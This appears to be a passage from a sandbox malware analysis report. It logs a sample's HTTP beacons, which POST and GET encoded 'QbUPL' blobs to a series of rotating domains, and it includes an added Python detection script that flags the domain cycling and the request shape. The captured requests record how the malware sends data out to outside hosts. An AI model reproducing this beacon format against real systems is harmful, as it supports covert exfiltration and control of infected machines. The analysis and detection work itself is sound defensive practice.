74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED]
                                                                    Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


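The sessions above, read together with the DNS table, show two things worth turning into detection logic: the host resolves a fresh, unrelated domain roughly every 13 to 14 seconds and contacts each one only once, and every request uses the same shape (a four-character directory, a `Connection: close` header, a fixed Chrome/39 User-Agent, and a single form key, `QbUPL`, carrying a long base64-looking blob either in the query string or in the POST body) regardless of which host it is sent to. The following Python is an added example, not part of the Joe Sandbox report or of the sample; `DNS_ROWS`, `BEACON_GET` and `BEACON_POST` are copied from the tables above (request headers the checks do not use are left out), while the thresholds (at least 8 distinct names, a median gap of 10 to 20 seconds, a blob of at least 64 characters) and the path pattern are my own choices derived from what this one report shows, not a general signature.

```python
"""Detection checks built from the DNS table and HTTP sessions above (added
example, not part of the Joe Sandbox report). DNS_ROWS, BEACON_GET and
BEACON_POST are copied from the report; the thresholds are my own choices."""
import re
import statistics
from datetime import datetime, timedelta
from urllib.parse import urlsplit

DNS_ROWS = [  # (timestamp, queried name), one entry per DNS transaction above
    ("Jan 11, 2025 08:16:36.263565063 CET", "www.grandesofertas.fun"),
    ("Jan 11, 2025 08:16:41.316077948 CET", "www.jijievo.site"),
    ("Jan 11, 2025 08:16:58.580473900 CET", "www.ytsd88.top"),
    ("Jan 11, 2025 08:17:12.712079048 CET", "www.bpgroup.site"),
    ("Jan 11, 2025 08:17:25.981236935 CET", "www.fortevision.xyz"),
    ("Jan 11, 2025 08:17:39.393934011 CET", "www.rtpterbaruwaktu3.xyz"),
    ("Jan 11, 2025 08:17:53.716451883 CET", "www.prhmcjdz.tokyo"),
    ("Jan 11, 2025 08:18:07.497442961 CET", "www.connecty.live"),
    ("Jan 11, 2025 08:18:20.787755013 CET", "www.tals.xyz"),
    ("Jan 11, 2025 08:18:34.471565008 CET", "www.50food.com"),
    ("Jan 11, 2025 08:18:47.739371061 CET", "www.zriaraem-skiry.sbs"),
]

BEACON_GET = """GET /z9pi/?QbUPL=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipuFwHgdvcemFSrMC8OxCAm29CGPtG+jrBp7iHLTW/uD4KAmAXSCgHgFK4&ef4=TJYXELnhFJhl HTTP/1.1
Host: www.jijievo.site
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
"""

BEACON_POST = """POST /8qt7/ HTTP/1.1
Host: www.ytsd88.top
Origin: http://www.ytsd88.top
Referer: http://www.ytsd88.top/8qt7/
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36

QbUPL=IrqOQ6xe73IIjJ5GOwygtrfSYGQn/rFaL7kqkhBqcZ6C9b1DeYEmKDfRuyc2WwEgv7Fke9kZJoubLGZizm0QjLdhXXU3NIbEQSGQkFZfaU4fmEfdMXIkJSPBZAkBVJ+JDnO2+NIgdy7GLNZFTtOj+s9rQHWQnB6ff+CeBXjFSqnc5e7pBxD0fZ9txQpwrKfUCK/8G0pfaPCwpHYpbg==
"""

UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")        # /z9pi/, /8qt7/, /mlxg/ above
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{64,}$")  # long base64-looking value


def parse_ts(s):
    """Parse the report's 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ' (9-digit fraction)."""
    body, _tz = s.rsplit(" ", 1)
    main, frac = body.split(".")
    micros = int(frac[:6].ljust(6, "0"))  # strptime %f takes at most 6 digits
    return datetime.strptime(main, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=micros)


def query_gaps(rows):
    """Seconds between consecutive DNS transactions, in time order."""
    ts = sorted(parse_ts(t) for t, _ in rows)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


def domain_cycling(rows, min_domains=8, lo=10.0, hi=20.0):
    """True when one client resolves many distinct names at a steady cadence,
    which is what the table above shows and what no browser or updater does."""
    gaps = query_gaps(rows)
    names = {n for _, n in rows}
    return len(names) >= min_domains and bool(gaps) and lo <= statistics.median(gaps) <= hi


def split_form(s):
    """Split k=v&k=v without percent-decoding, so '+' and '/' in the blob survive."""
    return [tuple(p.partition("=")[::2]) for p in s.split("&") if p]


def parse_http(raw):
    """Return (method, target, lower-cased header dict, body) for one request."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    return method, target, headers, body.strip()


def beacon_form_key(raw):
    """Return the form key (e.g. 'QbUPL') if the request has the beacon shape, else None."""
    method, target, h, body = parse_http(raw)
    url = urlsplit(target)
    if not (PATH_RE.match(url.path) and h.get("user-agent") == UA
            and h.get("connection") == "close"):
        return None
    if method == "GET":                 # blob plus one short trailing key
        params = split_form(url.query)
        ok = len(params) == 2 and BLOB_RE.match(params[0][1])
    elif method == "POST":              # form body; Origin/Referer faked to match Host
        params = split_form(body)
        ok = (h.get("content-type") == "application/x-www-form-urlencoded"
              and h.get("referer") == f"{h.get('origin')}{url.path}"
              and len(params) == 1 and BLOB_RE.match(params[0][1]))
    else:
        return None
    return params[0][0] if ok else None


def shared_form_keys(raws):
    """Form keys reused against two or more different Host values."""
    hosts = {}
    for raw in raws:
        key = beacon_form_key(raw)
        if key:
            hosts.setdefault(key, set()).add(parse_http(raw)[2].get("host"))
    return {k for k, hs in hosts.items() if len(hs) >= 2}
```

`domain_cycling(DNS_ROWS)` is true for the report's data (median gap about 13.5 s over 11 names), `beacon_form_key` returns `QbUPL` for both the GET and the POST above and `None` once any one of the shape constraints is broken, and `shared_form_keys` is the cross-host view: one key used against several unrelated domains is the strongest single indicator in this capture, because a legitimate site does not share a form parameter name with ten others.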
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49978 | 74.48.143.82 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:17:12.735057116 CET | 735 | OUT | POST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 51 34 74 58 78 43 41 63 4c 39 32 69 2f 52 5a 68 45 41 66 68 38 33 7a 6d 42 68 62 45 6d 79 59 75 75 57 63 2f 35 7a 33 49 49 30 71 75 6b 31 4a 43 67 3d 3d
                                                                    Data Ascii: QbUPL=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXoQ4tXxCAcL92i/RZhEAfh83zmBhbEmyYuuWc/5z3II0quk1JCg==
Jan 11, 2025 08:17:13.306324959 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:13 GMT
                                                                    server: LiteSpeed
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 08:17:13.306370020 CET | 253 | IN | Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49979 | 74.48.143.82 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 08:17:15.291090965 CET | 755 | OUT | POST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tPIiDFtTAvtsvSEybHWX/RAj2UNUXZ9U6WkkkJW/wDdvOGN/N0=
                                                                    Jan 11, 2025 08:17:15.867742062 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:16 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:15.867795944 CET | 253 | IN | Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.7 | 49980 | 74.48.143.82 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:17.833518028 CET | 1768 | OUT | POST /mlxg/ HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.bpgroup.site
                                                                    Referer: http://www.bpgroup.site/mlxg/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 73 51 73 38 4e 76 69 33 34 32 38 66 66 51 72 41 39 75 44 58 54 33 67 73 37 6e 32 6f 66 51 63 4d 42 68 75 67 30 54 66 79 77 44 44 38 66 62 67 45 6b 61 35 58 65 33 33 76 75 72 73 6f 49 6d 51 4e 72 59 75 46 36 55 4c 52 61 67 34 5a 4d 72 6d 58 4c 6e 62 6e 79 53 77 79 71 69 31 69 78 70 42 6c 7a 68 78 4f 79 66 6b 73 49 33 71 56 41 36 6b 41 43 74 7a 6d 48 6b 51 6d 4d 69 6b 37 55 33 61 44 61 35 47 55 78 53 72 73 32 31 6a 55 32 76 31 6a 67 45 6b 4b 35 64 4a 67 36 43 75 58 4c 77 70 69 56 46 [TRUNCATED]
                                                                    Jan 11, 2025 08:17:18.395745993 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:18 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:18.395800114 CET | 253 | IN | Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.7 | 49981 | 74.48.143.82 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:20.377585888 CET | 480 | OUT | GET /mlxg/?QbUPL=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGraedJXjbbCkeYoQqBrGkjzfTHxGy2G2a4+AXnGm9DtiGGRVBQ2NqOGZfd&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.bpgroup.site
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:20.955022097 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Sat, 11 Jan 2025 07:17:21 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                    Jan 11, 2025 08:17:20.955048084 CET | 253 | IN | Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                    Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.7 | 49982 | 13.248.169.48 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:26.007778883 CET | 744 | OUT | POST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=VOvhtrAHAUQdisOXZNLjcKKd0sfO2JBSaHER2T3cSKjvRvVgJltuEDoBQhx1oeAh1/HN3r9PyGYPpjYO3gNPju9jUJSDD9I2v/j0+5cuxFU/u93ix4qaeeeSXPuPs8h2zffxZrWvtcYOT3YL1eSGydszefB6WKt7tQp7OZyrTOyR0INs6wzAR1jpI7vJSmppbWUgppLF+xuBX58CDw==
                                                                    Jan 11, 2025 08:17:26.455938101 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.7 | 49983 | 13.248.169.48 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:28.553397894 CET | 764 | OUT | POST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=VOvhtrAHAUQdhM+XbujjVKKCwcfO4pBeaHAR2XOZSfzvRKpgIgBuFDoBYBxw3uBv14Pz3p5PyG8Ppm8OwTlOge9hNZSWeNI2v/j0+98ExFc/uJzi3teZdeeNUPuPnchyzfekZpuVtewOT2oL1vSF9dspAvAxX7AtoDluUIKmZM+c4eMOgS/sPkbSM5L/FA0cZXQ4kL/khGLrardGVD2oZtScLM0KVLSQQ+PWPTg=
                                                                    Jan 11, 2025 08:17:29.005220890 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.7 | 49984 | 13.248.169.48 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:31.098731995 CET | 1777 | OUT | POST /dash/ HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.fortevision.xyz
                                                                    Referer: http://www.fortevision.xyz/dash/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 56 4f 76 68 74 72 41 48 41 55 51 64 68 4d 2b 58 62 75 6a 6a 56 4b 4b 43 77 63 66 4f 34 70 42 65 61 48 41 52 32 58 4f 5a 53 63 54 76 51 2f 6c 67 4a 44 35 75 58 7a 6f 42 53 68 78 78 33 75 42 69 31 2b 6e 4a 33 70 31 31 79 45 30 50 6f 41 67 4f 31 6d 5a 4f 37 4f 39 68 51 4a 54 78 44 39 49 2f 76 38 62 77 2b 35 51 45 78 46 63 2f 75 49 44 69 6d 34 71 5a 62 65 65 53 58 50 75 44 73 38 68 4b 7a 66 58 54 5a 70 72 6f 73 76 51 4f 54 57 34 4c 33 39 36 46 30 64 73 33 42 76 42 78 58 37 4e 7a 6f 46 42 31 55 49 2f 78 5a 4d 47 63 39 37 34 55 30 7a 58 52 5a 46 48 77 53 71 66 53 46 7a 73 4c 65 46 6f 67 6d 4d 43 47 39 56 54 50 57 64 78 34 55 33 2f 58 50 63 4b 39 41 76 42 63 54 74 44 73 42 4e 76 4f 53 46 43 4f 59 35 33 2b 76 51 4d 6b 72 55 46 63 49 5a 39 76 67 48 75 59 4b 46 75 51 79 49 58 41 49 49 55 4c 43 48 72 5a 4d 72 39 4c 6e 4f 53 51 52 6b 31 32 4b 45 6a 6e 44 6f 57 44 4e 2b 51 6f 43 4a 46 43 32 45 51 46 4b 77 78 68 43 36 74 6a 41 59 4e 38 79 75 7a 48 78 33 73 44 76 56 4d 34 44 59 59 41 74 41 7a 6b [TRUNCATED]
                                                                    Jan 11, 2025 08:17:31.571757078 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                    content-length: 0
                                                                    connection: close


